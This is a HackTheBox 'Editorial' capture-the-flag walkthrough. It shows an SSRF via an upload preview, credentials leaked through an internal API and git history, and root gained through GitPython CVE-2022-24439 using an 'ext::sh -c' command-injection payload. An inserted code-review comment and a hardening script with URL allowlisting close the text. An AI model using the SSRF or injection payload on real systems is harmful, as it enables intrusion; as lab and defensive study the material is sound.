Hello everyone! Back again with me. This time I will walk through the HackTheBox machine called “Editorial”. Let's learn together how to obtain user and root access on this machine.
Reconnaissance
As usual, the first step is to perform reconnaissance on the target using Nmap:
nmap -sSCV -O -A 10.10.11.20 -T5
Scan results:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-22 09:37 EST
Nmap scan report for 10.10.11.20
Host is up (0.26s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0d:ed:b2:9c:e2:53:fb:d4:c8:c1:19:6e:75:80:d8:64 (ECDSA)
|_ 256 0f:b9:a7:51:0e:00:d5:7b:5b:7c:5f:bf:2b:ed:53:a0 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editorial.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Web Enumeration
Based on the scan results, the web server redirects to http://editorial.htb. This hostname needs to be added to the /etc/hosts file.

While browsing the website, I found several email addresses on the “About” page. These could be useful as usernames in a later stage.
Exploit – SSRF in the Upload Feature
In the “Publish with Us” menu there is a file upload form with several input fields. The interesting part is the “Preview” feature, which sends a request to the server.


When attempting SSRF (Server-Side Request Forgery) by pointing the request at my own IP:
nc -lvnp 1334
The result:

listening on [any] 1334 ...
connect to [10.10.14.67] from (UNKNOWN) [10.10.11.20] 40922
GET / HTTP/1.1
Host: 10.10.14.67:1334
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Port Fuzzing & API Discovery
After trying several internal IPs with various ports, I found a different response on port 5000. Using the browser's option to open the image in a new tab, the file was downloaded automatically.


The file's contents (after processing with jq):
{
  "messages": [
    {
      "promotions": {
        "description": "Retrieve a list of all the promotions in our library.",
        "endpoint": "/api/latest/metadata/messages/promos",
        "methods": "GET"
      }
    },
    {
      "coupons": {
        "description": "Retrieve the list of coupons to use in our library.",
        "endpoint": "/api/latest/metadata/messages/coupons",
        "methods": "GET"
      }
    },
    {
      "new_authors": {
        "description": "Retrieve the welcome message sended to our new authors.",
        "endpoint": "/api/latest/metadata/messages/authors",
        "methods": "GET"
      }
    },
    {
      "platform_use": {
        "description": "Retrieve examples of how to use the platform.",
        "endpoint": "/api/latest/metadata/messages/how_to_use_platform",
        "methods": "GET"
      }
    }
  ],
  "version": [
    {
      "changelog": {
        "description": "Retrieve a list of all the versions and updates of the api.",
        "endpoint": "/api/latest/metadata/changelog",
        "methods": "GET"
      }
    },
    {
      "latest": {
        "description": "Retrieve the last version of api.",
        "endpoint": "/api/latest/metadata",
        "methods": "GET"
      }
    }
  ]
}
Obtaining Credentials

After noticing the endpoint related to “authors”, I focused on that API and obtained the following information:
{
  "template_mail_message": "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."
}
User Access
With those credentials, I successfully logged in via SSH:
ssh dev@10.10.11.20
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-112-generic x86_64)
...
dev@editorial:~$ whoami
dev
dev@editorial:~$ ls
apps user.txt
dev@editorial:~$ cat user.txt
46de1ee298c9f3...............
Privilege Escalation
After logging in as the dev user, I found the apps folder with a Git repository inside it:
dev@editorial:~/apps$ ls -la
total 12
drwxrwxr-x 3 dev dev 4096 Jun 5 2024 .
drwxr-x--- 6 dev dev 4096 Dec 22 15:05 ..
drwxr-xr-x 8 dev dev 4096 Jun 5 2024 .git
Checking the Git log:
dev@editorial:~/apps$ git log
I found an interesting commit with the message “change(api): downgrading prod to dev”. Looking at it in more detail:
dev@editorial:~/apps$ git show b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
diff --git a/app_api/app.py b/app_api/app.py
index 61b786f..3373b14 100644
--- a/app_api/app.py
+++ b/app_api/app.py
@@ -64,7 +64,7 @@ def index():
@app.route(api_route + '/authors/message', methods=['GET'])
def api_mail_new_authors():
return jsonify({
- 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: prod\nPassword: 080217_ProductionAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
+ 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
}) # TODO: replace dev credentials when checks pass
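Review bot: the `'template_mail_message'` string in this hunk still embeds a live credential in source, and since it is returned by `api_mail_new_authors()` it is served to anyone who can reach the authors endpoint; swapping the `prod` password for a `dev` one does not remove the old value from history, so the `prod` credential must be rotated as well. Suggest loading any welcome credentials from an environment variable or secret store rather than a string literal, dropping the password from the API response entirely, and resolving the `# TODO: replace dev credentials when checks pass` before this is merged rather than leaving it as a comment.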
Root Access
With the prod user's credentials found there, I switched to that user and checked its sudo rights:
dev@editorial:~/apps$ su prod
Password:
prod@editorial:/home/dev/apps$ sudo -l
[sudo] password for prod:
Matching Defaults entries for prod on editorial:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User prod may run the following commands on editorial:
(root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *
Examining that Python file:
prod@editorial:/home/dev/apps$ cat /opt/internal_apps/clone_changes/clone_prod_change.py
#!/usr/bin/python3
import os
import sys
from git import Repo
os.chdir('/opt/internal_apps/clone_changes')
url_to_clone = sys.argv[1]
r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
Exploiting GitPython
After some investigation, I found that the system uses GitPython 3.1.29, which is vulnerable to CVE-2022-24439. I exploited this vulnerability with the command:

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c cat% /root/root.txt% >% /tmp/root'
With that command, the root flag was copied to /tmp/root, which the prod user can read.
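The script above passes a user-controlled argument straight to clone_from and explicitly enables the ext:: remote helper, which is what turns a clone into command execution. As an added example, not the box's script or GitPython's own code, this is how the same job could validate its argument before cloning: remote-helper syntax is rejected outright, only https and ssh transports to an allowlisted host are accepted, and protocol.ext.allow is set to never instead of always. The hostname git.example.internal is a placeholder, and check_clone_url and clone_change are names chosen here.

```python
from urllib.parse import urlsplit

# Transports the job may use. Helper transports such as "ext::" (runs a
# command) or "fd::" are deliberately absent.
ALLOWED_SCHEMES = {"https", "ssh"}
# Placeholder for the internal Git server this job is meant to clone from
# (assumption; not a hostname from the box).
ALLOWED_HOSTS = {"git.example.internal"}


def check_clone_url(url):
    """Return (ok, reason) for a clone URL handed to the script."""
    if "::" in url:
        # git's "<helper>::<address>" syntax selects a remote helper;
        # reject it before it can reach git at all.
        return False, "remote-helper syntax is not allowed"
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        # scp-style "user@host:path" has no scheme and is rejected too;
        # callers must use the ssh:// form so the host can be checked.
        return False, f"transport {parts.scheme!r} not allowed"
    if parts.hostname not in ALLOWED_HOSTS:
        return False, f"host {parts.hostname!r} not allowed"
    return True, "ok"


def clone_change(url, dest="new_changes"):
    """Clone only after validation, with the ext helper disabled in git's config."""
    ok, reason = check_clone_url(url)
    if not ok:
        raise ValueError(reason)
    # GitPython import is deferred so check_clone_url is testable without it.
    from git import Repo
    return Repo.clone_from(
        url,
        dest,
        multi_options=["-c protocol.ext.allow=never"],
    )


if __name__ == "__main__":
    import sys
    # Mirrors the original one-argument interface; only the validation differs.
    ok, reason = check_clone_url(sys.argv[1] if len(sys.argv) > 1 else "")
    print("accepted" if ok else f"rejected: {reason}")
```

Two points apply beyond the script itself. The sudo rule ends in a wildcard, so every argument reaches the script and the validation above is the only thing standing between a user and root; running the clone job as an unprivileged service account removes most of the impact even if a check is missed. Upgrading GitPython past 3.1.29 also matters, since later releases refuse unsafe protocol URLs in clone_from by default, but an allowlist in the caller does not depend on the library's defaults.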
